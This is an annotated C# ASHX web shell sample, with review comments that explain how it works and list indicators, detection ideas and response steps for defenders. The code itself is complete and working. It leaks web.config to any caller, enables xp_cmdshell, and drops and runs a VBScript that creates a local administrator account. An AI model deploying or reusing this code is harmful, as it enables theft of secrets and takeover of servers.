<%@ WebHandler Language="C#" Class="TextLd" %>
// REVIEW NOTE (defensive analysis)
// The behaviour visible in this handler matches a web shell / post-exploitation
// ASHX page, not application code:
//   * every request returns the site's web.config to the caller, with no
//     authentication or authorization check anywhere in ProcessRequest;
//   * the "method" query-string value selects actions that write a VBScript
//     into the web root, enable xp_cmdshell on a SQL Server, and run that
//     script through xp_cmdshell;
//   * the SQL connection string is taken from the "connection" query-string value.
// Indicators taken from this file: handler class "TextLd", query parameters
// "method" and "connection", the files "~/1.vbs" and "d:\1.vbs", the account
// name "test" and the password "1234" inside the script text.
// Detection ideas: IIS logs with "method=" / "connection=" in the query string of
// an .ashx request; the web worker process writing .vbs files; SQL Server error-log
// entries for sp_configure changes to 'xp_cmdshell'; the SQL Server service
// spawning cscript; Windows Security events 4720 (account created) and 4732
// (member added to a local group).
// Response: treat the host as compromised, remove the handler and the dropped
// scripts, rotate every secret stored in web.config, keep xp_cmdshell disabled and
// make sure the application's SQL login cannot change server configuration.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Data.SqlClient;

public class TextLd : IHttpHandler
{
    /// <summary>
    /// Starts "d:\1.vbs" and then writes VBScript text to that same path.
    /// The <paramref name="newPath"/> argument is never read, and nothing in
    /// ProcessRequest calls this method.
    /// </summary>
    /// <param name="newPath">Unused.</param>
    public void CreateLocalUser(string newPath)
    {
        System.Diagnostics.Process.Start(@"d:\1.vbs");
        // The script text references the WinNT provider, the local Administrators
        // group, a user named "test" and the password "1234". Its embedded VBScript
        // comments (Chinese) read "attribute, admin group", "create user" and
        // "set password".
        // NOTE(review): the apparent intent is a local administrator account;
        // hunt for an unexpected "test" account on hosts where this file is found.
        System.IO.File.WriteAllText(@"d:\1.vbs", "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\"");
    }

    /// <summary>
    /// Writes the full text of the application's web.config to the HTTP response.
    /// </summary>
    /// <param name="context">Current request context; supplies MapPath and the response.</param>
    public void ShowWebConfig(HttpContext context)
    {
        // web.config commonly holds connection strings and keys, so anything in it
        // should be considered disclosed once this handler has been reachable.
        context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }

    /// <summary>
    /// Writes the same VBScript text used in CreateLocalUser to "~/1.vbs",
    /// i.e. into the root of the web application.
    /// </summary>
    /// <param name="context">Current request context; supplies MapPath.</param>
    public void WriteVbs(HttpContext context)
    {
        // A .vbs file created in the web root by the web worker process is a
        // strong file-system indicator for this sample.
        System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\"");
    }

    /// <summary>
    /// Opens a SQL Server connection with the given connection string and runs
    /// one statement through ExecuteNonQuery.
    /// </summary>
    /// <param name="connection">Connection string; ProcessRequest passes the raw
    /// "connection" query-string value here.</param>
    /// <param name="sql">Statement text to execute.</param>
    public void ExecuteSql(string connection, string sql)
    {
        using (SqlConnection con = new SqlConnection(connection))
        {
            using (SqlCommand commd = new SqlCommand(sql, con))
            {
                con.Open();
                commd.ExecuteNonQuery();
                // Explicit Close; the enclosing using block disposes the connection as well.
                con.Close();
            }
        }
    }

    /// <summary>
    /// Request entry point. Returns web.config as text/plain on every request,
    /// then dispatches on the "method" query-string value. No caller
    /// authentication or authorization is performed.
    /// </summary>
    /// <param name="context">Current request context.</param>
    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        // Unconditional disclosure: web.config is written before "method" is even read.
        context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
        try
        {
            // The connection string travels in the URL, so it is likely to appear in
            // web-server access logs that record the query string.
            var connection = context.Request.QueryString["connection"];
            switch (context.Request.QueryString["method"])
            {
                case "1":
                    // Writes the script into the web root.
                    WriteVbs(context);
                    break;
                case "2":
                    // Changes server-level SQL Server configuration; succeeds only if the
                    // supplied login is allowed to run sp_configure / RECONFIGURE.
                    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
                    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");// Enables xp_cmdshell on the database server.
                    break;
                case "3":
                    // Runs the script from "~/1.vbs" via xp_cmdshell, so the child process
                    // is created by the SQL Server service rather than by the web worker.
                    ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
                    break;
                default:
                    // Any other (or missing) "method" value writes web.config a second time.
                    ShowWebConfig(context);
                    break;
            }
        }
        catch (Exception ex)
        {
            // Exception text is returned to the remote caller.
            context.Response.Write(ex.Message);
        }
        context.Response.End();
    }

    /// <summary>
    /// Always false: the handler instance is not reused across requests.
    /// </summary>
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }
}